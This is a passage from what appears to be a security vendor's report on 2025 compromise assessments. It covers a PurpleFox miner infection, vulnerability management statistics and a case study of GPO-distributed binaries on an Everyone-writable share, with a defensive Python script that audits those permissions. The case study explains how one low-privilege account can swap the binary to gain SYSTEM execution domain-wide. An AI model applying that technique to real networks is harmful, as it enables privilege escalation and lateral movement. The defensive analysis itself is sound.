    PurpleFox drops specially crafted DLLs and forces svchost.exe to load them. From there, it installs a kernel-mode driver that gives the attacker persistent and stealthy execution capabilities, as well as the ability to pull additional payloads. This results in the loading of the XMRig miner.

    The deployed EPP solution monitored file creation, registry modifications and network connections. However, its memory inspection module was disabled. Additionally, the signature set applied at the time of the assessment was not up to date. As a result, no alerts were generated for the injected DLLs or the miner’s shellcode. The compromise assessment team identified this detection gap during the memory analysis phase and documented the missing in-memory inspection capability in the final report.

    The organization’s security operations were outsourced to an MSSP, which collected the logs and forwarded them to the SIEM solution. Because the logs never contained alerts for in-memory activity, PurpleFox activity was not identified.

    Insufficient vulnerability management: A catalyst for high-severity compromises

    In the 2025 compromise assessment engagements, more than half of the threats identified and linked to insufficient vulnerability management practices or missing patches were classified as high severity. The most frequently observed consequences were the deployment of web shells that enabled persistent remote code execution and the exploitation of misconfigured Active Directory instances.

    Severity distribution of incidents due to improper vulnerability management

    The root causes of missing patches are multifaceted. They include inadequate asset inventory management (25% of projects) and the absence of formal vulnerability management processes (41% of projects). Moreover, 86% of organizations that claimed to have a vulnerability management program still exhibited exploited misconfigurations during compromise assessment engagements. These findings suggest that robust patch management, comprehensive asset inventory practices, and structured vulnerability management processes are critical for preventing high-severity incidents.

    Case study: How overly permissive GPO-based software distribution goes wrong

    During multiple compromise assessment engagements, a high-impact misconfiguration was consistently observed: a Group Policy Object (GPO) was used to point to an executable in a shared folder and run it on every workstation via a scheduled task. The access control list (ACL) on the share was set to “Everyone – Full Control”.

    Given that any authenticated domain user can write to the share, an attacker who compromises a single low-privilege account can replace the legitimate binary with a malicious payload. The next scheduled task run propagates the payload automatically to all endpoints that receive the GPO. This provides:

    • Elevated execution context: the scheduled task typically runs under the SYSTEM or local administrator account.
    • Automatic lateral movement: the malicious binary propagates without requiring additional network exploitation.
    • Privilege escalation: a compromised low-privilege account can lead to domain administrator code execution.

    Vulnerability management procedures that include systematic GPO and share permission audits would have flagged the writeable ACL as a high-severity finding, enabling remediation before exploitation. Remediation typically involves restricting the share permissions to “Authenticated Users” with read-only access and limiting modifications to certain privileged accounts. Incorporating these checks into the baseline security controls reduces the attack surface, demonstrating the tangible risk reduction achievable through disciplined vulnerability assessment and penetration testing (VAPT) practices.
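The audit described above can be automated by joining the executables referenced by GPO scheduled tasks with the ACLs on those files. This is an added example, not from the original report: the XML is a constructed, simplified stand-in for a Group Policy Preferences ScheduledTasks.xml, the ACL listing is constructed icacls-style output, and all names are hypothetical. It covers file-level ACLs only; share-level permissions need the same review.

```python
import re
import xml.etree.ElementTree as ET

# Constructed, simplified sample modeled on a Group Policy Preferences
# ScheduledTasks.xml; task names, server and paths are hypothetical.
GPP_XML = r"""<ScheduledTasks>
  <TaskV2 name="InventoryAgent">
    <Properties action="C" name="InventoryAgent" runAs="NT AUTHORITY\System">
      <Task><Actions><Exec><Command>\\fs01\deploy\inventory.exe</Command></Exec></Actions></Task>
    </Properties>
  </TaskV2>
  <TaskV2 name="MapDrives">
    <Properties action="C" name="MapDrives" runAs="BUILTIN\Users">
      <Task><Actions><Exec><Command>\\fs01\scripts\map.cmd</Command></Exec></Actions></Task>
    </Properties>
  </TaskV2>
</ScheduledTasks>"""

# Constructed icacls-style listing for the two referenced files.
ICACLS_OUT = r"""\\fs01\deploy\inventory.exe Everyone:(I)(F)
                            BUILTIN\Administrators:(I)(F)

\\fs01\scripts\map.cmd NT AUTHORITY\Authenticated Users:(I)(RX)
                       CORP\GPO-Admins:(I)(M)
"""

BROAD = {"everyone", "authenticated users", "users", "domain users", "domain computers"}
WRITE = {"F", "M", "W", "WD", "AD"}   # icacls rights that allow replacing a file
ACE = re.compile(r"^(?P<who>[^:(]+):(?P<perm>(?:\([^)]+\))+)$")

def tasks_from_gpp(xml_text):
    """Yield (task name, run-as account, command) for every Exec action."""
    for task in ET.fromstring(xml_text).iter("TaskV2"):
        props = task.find("Properties")
        run_as = props.get("runAs", "") if props is not None else ""
        for cmd in task.iter("Command"):
            yield task.get("name"), run_as, (cmd.text or "").strip()

def parse_icacls(text, paths):
    """Map each known path to its ACEs as (principal, [flags..., rights])."""
    acls, current = {}, None
    for line in text.splitlines():
        body = line.strip()
        if not body:
            current = None        # a blank line ends the listing for one object
            continue
        for p in paths:
            if body.lower().startswith(p.lower() + " "):
                current, body = p, body[len(p):].strip()
        m = ACE.match(body)
        if current and m:
            acls.setdefault(current, []).append((m["who"], re.findall(r"\(([^)]+)\)", m["perm"])))
    return acls

def audit(xml_text, icacls_text):
    """Return one finding per task binary that a broad principal can overwrite."""
    tasks = list(tasks_from_gpp(xml_text))
    acls = parse_icacls(icacls_text, [cmd for _, _, cmd in tasks])
    findings = []
    for name, run_as, cmd in tasks:
        for who, perm in acls.get(cmd, []):
            *flags, rights = perm
            broad = who.split("\\")[-1].lower() in BROAD
            if broad and "DENY" not in flags and WRITE & set(rights.split(",")):
                sev = "high" if "system" in run_as.lower() else "medium"
                findings.append({"task": name, "path": cmd, "principal": who,
                                 "rights": rights, "run_as": run_as, "severity": sev})
    return findings
```

With the sample data, only the InventoryAgent task is reported: its binary grants Everyone full control and the task runs as SYSTEM.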

    Conclusion

    In 2025, Kaspersky Compromise Assessment helped organizations reveal a persistent detection gap: 30.8% of all incidents and 52% of high-severity compromises had historical activity spanning over three months. Of all the incidents discovered, 20% were found manually, while 60% were missed by enterprises because of the absence of high-confidence alerts from existing tools. The oldest missed incident identified by the Kaspersky Compromise Assessment team in 2025 was four years old.

    Post-incident checkups produced the highest percentage of high-severity findings, while regular proactive audits, compliance-driven audits, and audits performed before merging two networks tended to reveal issues earlier. This indicates that purely reactive investigations often miss hidden persistence. The top high-level recommendations for immediate improvement in 2025 for all projects were:

    • Run a comprehensive detection engine health check within 30 days of project closure, prioritizing telemetry integrity and rule relevance.
    • Introduce a Tier 1 alert validation team that reviews all low-confidence events on a defined schedule.
    • Ensure robust 24/7 monitoring augmented with threat hunting capabilities focused on baselining, low-fidelity alerts, and emerging adversary techniques.
    • Reevaluate the vulnerability management pipeline to ensure continuous patching and audit log activation across all critical assets.
    • Update security awareness curricula to address credential leakage from personal devices and reinforce secure BYOD practices.
    • Ensure periodic tabletop exercises are run to test technical playbooks and sharpen the team’s skills and communication workflows.
    • Establish operational-level agreements to govern and facilitate communication between different teams and standard operating procedures used for proper documentation.

    Addressing the root cause categories systematically will reduce the likelihood of future blind spots and improve the overall security posture of the engaged organizations.

    Alleged Scattered Spider hacker extradited to the United States

    Bleeping Computer - 12 hours 6 min ago
    A dual United States and Estonian citizen has been extradited to the U.S. to face charges alleging he was a member of the Scattered Spider hacking collective. [...]
    Category: Hacking & Security